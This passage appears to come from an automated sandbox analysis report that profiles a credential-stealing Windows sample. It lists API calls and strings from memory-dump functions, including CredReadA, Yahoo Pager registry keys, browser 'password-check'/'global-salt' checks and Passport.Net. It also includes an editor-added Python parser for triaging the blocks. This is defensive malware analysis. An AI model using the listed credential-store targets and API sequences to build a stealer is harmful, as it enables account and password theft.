                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2014771361-0
                                                                                                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                    • String ID: global-salt$password-check
                                                                                                                                                                                    • API String ID: 231171946-3927197501
                                                                                                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
• Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
• Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
• Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
APIs
• GetClientRect.USER32(?,?), ref: 004016A3
• GetSystemMetrics.USER32(00000015), ref: 004016B1
• GetSystemMetrics.USER32(00000014), ref: 004016BD
• BeginPaint.USER32(?,?), ref: 004016D7
• DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
• EndPaint.USER32(?,?), ref: 004016F3
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
• String ID:
• API String ID: 19018683-0
• Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
• Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
• Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
APIs
• memset.MSVCRT ref: 0040644F
• memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
• memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
  • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
  • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
• memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
• memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
• memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
• memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
  • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
• Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
• Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
APIs
• memset.MSVCRT ref: 0044495F
• memset.MSVCRT ref: 00444978
• memset.MSVCRT ref: 0044498C
  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
• strlen.MSVCRT ref: 004449A8
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
• memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
• memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset$strlen
• String ID:
• API String ID: 2142929671-0
• Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
• Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
• Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
• Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
APIs
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
  • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
• strlen.MSVCRT ref: 0040F7BE
• _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
• LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
• String ID: Passport.Net\*
• API String ID: 2329438634-3671122194
• Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
• Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
• Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
• Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
APIs
  • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
• memset.MSVCRT ref: 0040330B
• GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
• strchr.MSVCRT ref: 0040335A
  • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
• strlen.MSVCRT ref: 0040339C
  • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
• String ID: Personalities
• API String ID: 2103853322-4287407858
• Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
• Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
• Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
• Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
• Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
• Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
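The block above is the kind of routine behind the "Tries to steal Instant Messenger accounts or passwords" signature in the overview: a registry open of HKEY_LOCAL_MACHINE (80000002) with KEY_READ (00020019) against the Shell Folders key, followed by a value query, with the strings Software\Yahoo\Pager and Yahoo! User ID in the same function. To make blocks like this easier to triage in bulk, the following parser (an editor-added example, not Joe Sandbox code) turns one function-summary block into a record: it splits the API list, keeps the subcall relationship, decodes the registry hive handles and access masks that appear as arguments, collects registry paths named either in arguments or in the String ID list, and splits the dump file name. Two assumptions are made that the page does not state: the .sdmp name's first field is the process ID in hex and its fourth and fifth fields are the base address and page protection; and because the argument lists are printed as observed stack values (the repeated 80000002 entries in the RegOpenKeyExA line are not a clean prototype), constants are matched wherever they occur rather than by position. The sample input is the block above, copied verbatim.

```python
"""Parse one Joe Sandbox function-summary block (APIs / Strings / Memory Dump
Source / Similarity) into a record.  Editor-added example, not Joe Sandbox code.
SAMPLE is the Yahoo! Pager block copied from this report page."""
import re

# Hive handles and access masks from winreg.h.  They are matched wherever they
# appear: the argument lists are observed stack values, so positions are not trusted.
KNOWN_CONSTANTS = {
    "80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS",
    "00020019": "KEY_READ", "00020006": "KEY_WRITE", "000F003F": "KEY_ALL_ACCESS",
}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# "• RegCloseKey.ADVAPI32(?,000003FF), ref: 004445DF" or "• memset.MSVCRT ref: 00444573",
# optionally prefixed with "Part of subcall function <addr>: ".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
BULLET_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Similarity")

SAMPLE = r"""
APIs
• memset.MSVCRT ref: 00444573
  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpenQueryValuememset
• String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
• API String ID: 1830152886-1703613266
• Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
"""


def parse_dump_name(name):
    """Split '<pid>.<stage>.<id>.<base>.<protect>.....sdmp'.  Field meaning is an
    assumption about Joe Sandbox's naming: PID and base are hex, protect is PAGE_*."""
    f = name.strip().split(".")
    prot = int(f[4], 16)
    return {"pid": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(prot, hex(prot))}


def decode_constant(arg):
    """Name a hive handle or access mask; anything else is returned unchanged."""
    return KNOWN_CONSTANTS.get(arg.upper(), arg)


def describe_call(api):
    """Render one call with constants decoded, module first as on the page."""
    return "%s.%s(%s)" % (api["module"], api["name"],
                          ", ".join(decode_constant(a) for a in api["args"]))


def parse_function_block(text):
    rec = {"apis": [], "strings": [], "api_id": "", "api_string_id": "",
           "instruction_fuzzy_hash": "", "dump": None}
    section = None
    for line in text.splitlines():
        s = line.strip()
        if not s:
            continue
        if s in SECTIONS:
            section = s
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
                rec["apis"].append({"name": m["name"], "module": m["mod"],
                                    "subcall_of": m["sub"], "ref": m["ref"], "args": args})
            continue
        m = BULLET_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            rec["dump"] = parse_dump_name(val.split(",")[0])
        elif key == "API ID":
            rec["api_id"] = val
        elif key == "String ID":
            rec["strings"] = [x for x in val.split("$") if x]
        elif key == "API String ID":
            rec["api_string_id"] = val
        elif key == "Instruction Fuzzy Hash":
            rec["instruction_fuzzy_hash"] = val
    return rec


def registry_paths(rec):
    """Registry key paths seen in call arguments or in the String ID list."""
    cands = [a for api in rec["apis"] for a in api["args"]] + rec["strings"]
    return sorted({c for c in cands if c.lower().startswith("software\\")})


if __name__ == "__main__":
    rec = parse_function_block(SAMPLE)
    for api in rec["apis"]:
        print(describe_call(api))
    print(registry_paths(rec))
    print(rec["dump"])
```

Run on the block above, the decoded RegOpenKeyExA call reads HKEY_LOCAL_MACHINE / KEY_READ, the registry paths come out as the Shell Folders key and Software\Yahoo\Pager, and the dump resolves to PID 132 at base 0x400000 with PAGE_EXECUTE_READWRITE protection, which matches the "changes PE section rights" and "Maps a DLL or memory area into another process" signatures for an unpacked image rather than a normally loaded one. Feeding every block on the page through the same function gives a table of which functions touch which credential stores.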

APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset
• String ID: H
• API String ID: 2221118986-2852464175
• Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
• Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
• Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
• Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98

APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy
• String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
• API String ID: 3510742995-3170954634
• Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
• Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
• Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
• Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98

APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpy$memset
• String ID: winWrite1$winWrite2
• API String ID: 438689982-3457389245
• Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
• Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
• Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
• Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99

APIs
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset
• String ID: winRead
• API String ID: 1297977491-2759563040
• Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
• Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
• Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
• Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9

APIs
• memset.MSVCRT ref: 0044955B
• memset.MSVCRT ref: 0044956B
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
• memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
Strings
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
• Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
• Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
• Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715

APIs
• GetParent.USER32(?), ref: 004090C2
• GetWindowRect.USER32(?,?), ref: 004090CF
• GetClientRect.USER32(00000000,?), ref: 004090DA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
• Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
• Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5

APIs
  • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
  • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
  • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
• SetBkMode.GDI32(?,00000001), ref: 0041079E
• GetSysColor.USER32(00000005), ref: 004107A6
• SetBkColor.GDI32(?,00000000), ref: 004107B0
• SetTextColor.GDI32(?,00C00000), ref: 004107BE
• GetSysColorBrush.USER32(00000005), ref: 004107C6
Memory Dump Source
• Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Color$BrushClassModeNameText_strcmpimemset
• String ID:
• API String ID: 2775283111-0
• Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
• Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
